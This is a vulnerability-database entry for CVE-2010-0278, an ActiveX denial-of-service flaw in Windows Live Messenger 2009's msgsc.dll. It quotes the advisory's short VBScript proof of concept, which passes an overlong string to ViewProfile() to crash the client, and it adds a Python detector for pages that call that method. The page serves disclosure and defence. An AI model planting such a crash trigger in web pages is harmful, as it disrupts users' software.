Microsoft Windows Live Messenger 'msgsc.dll' ViewProfile() Method Call Remote Overflow Vulnerability

Vulnerability ID: 1118880
Vulnerability type: Other
Published: 2010-01-08
Updated: 2010-01-13
CVE ID: CVE-2010-0278
CNNVD-ID: CNNVD-201001-077
Platform: Windows
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/11070
https://cxsecurity.com/issue/WLB-2010010172
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-077
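|Vulnerability details
Windows Live Messenger is a very popular instant messaging client. The msgsc.dll ActiveX control installed by MSN does not properly validate the argument passed to the ViewProfile() method. If a user is tricked into visiting a malicious web page that passes an overlong argument to this method, a buffer overflow is triggered and the msnmsgr.exe process crashes.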
|Vulnerability EXP
Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)

********************************************************************************
Vulnerability:
ActiveX - Denial of Service

********************************************************************************
Discussion:
Vulnerability is in the ActiveX control (msgsc.14.0.8089.726.dll).
Sending a string to ViewProfile() causes a crash in msnmsgr.exe.
*You must be signed in to an MSN Messenger account to trigger the vulnerability.

********************************************************************************
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7

Not Vulnerable:
Windows Live Messenger 2009 on Windows XP

Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com

and

Natal Networks Inc.
Vulnerability Discovery, Penetration Testing, IT Security Consulting
www.natalnetworks.com

********************************************************************************

Original Advisory
www.hackattack.com
www.natalnetworks.com

********************************************************************************
PoC .wsf script:
'works on vista and windows7

<package>

<job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />

<script language='vbscript'>

arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

target.ViewProfile arg1

</script>

</job>

</package>

About HACKATTACK and Natal Networks
================
HACKATTACK IT SECURITY GmbH is a penetration testing and security auditing company located in Germany and Austria.
More information about HACKATTACK at
http://www.hackattack.com

Natal Networks was founded by Hellcode Research Team in 2009.
The main mission of Natal Networks is to discover and research vulnerabilities,
providing penetration tests and security auditing services.
More at: www.natalnetworks.com
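
A defender-side check for the condition described on this page, as an added example that is not part of the original advisory or of this database entry: it scans page or script content for an `<object>` bound to the CLSID used in the PoC and reports every call to ViewProfile on that object. The function names, the sample documents and the placeholder CLSID in the benign sample are constructed for illustration; controls created from script by ProgID are not covered, because the page gives no ProgID.

```python
import re

# CLSID and method name are the ones used in the PoC on this page.
MSGSC_CLSID = "B69003B3-C55E-4B48-836C-BC5946FC3B28"
METHOD = "ViewProfile"

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I | re.S)
ATTR = re.compile(r"""\b(classid|id)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)


def control_ids(markup):
    """Return the script-visible ids of <object> tags bound to the msgsc.dll CLSID."""
    ids = set()
    for tag in OBJECT_TAG.findall(markup):
        attrs = {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
                 for m in ATTR.finditer(tag)}
        clsid = attrs.get("classid", "").lower().replace("clsid:", "").strip("{} ")
        if clsid == MSGSC_CLSID.lower() and attrs.get("id"):
            ids.add(attrs["id"].lower())
    return ids


def find_calls(markup):
    """Return (object_id, line_number) for every ViewProfile call on the control."""
    ids = control_ids(markup)
    if not ids:
        return []
    names = "|".join(re.escape(i) for i in sorted(ids))
    # Matches both VBScript (obj.ViewProfile arg) and JScript (obj.ViewProfile(arg)).
    call = re.compile(r"\b(%s)\s*\.\s*%s\b" % (names, METHOD), re.I)
    return [(m.group(1).lower(), n)
            for n, line in enumerate(markup.splitlines(), 1)
            for m in call.finditer(line)]


# Constructed samples: the argument is a short placeholder, not the PoC string.
SAMPLE_FLAGGED = """<html><body>
<object id="msn" classid="CLSID:{B69003B3-C55E-4B48-836C-BC5946FC3B28}"></object>
<script language="vbscript">
value = "placeholder"
MSN.ViewProfile value
</script></body></html>"""
# Same markup with a constructed, unrelated CLSID: must not be reported.
SAMPLE_BENIGN = SAMPLE_FLAGGED.replace(MSGSC_CLSID, "00000000-0000-0000-0000-000000000001")

if __name__ == "__main__":
    for name, doc in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(name, find_calls(doc))
```

Matching is case-insensitive because VBScript identifiers are, so the check may over-report on JScript content that differs only in case.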
|References

Source: BID
Name: 37680
Link: http://www.securityfocus.com/bid/37680
Source: BUGTRAQ
Name: 20100108 [HACKATTACK Advisory 080110] Windows Live Messenger 2009 ActiveX DoS Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/508811/100/0/threaded
Source: NSFOCUS
Name: 14321
Link: http://www.nsfocus.net/vulndb/14321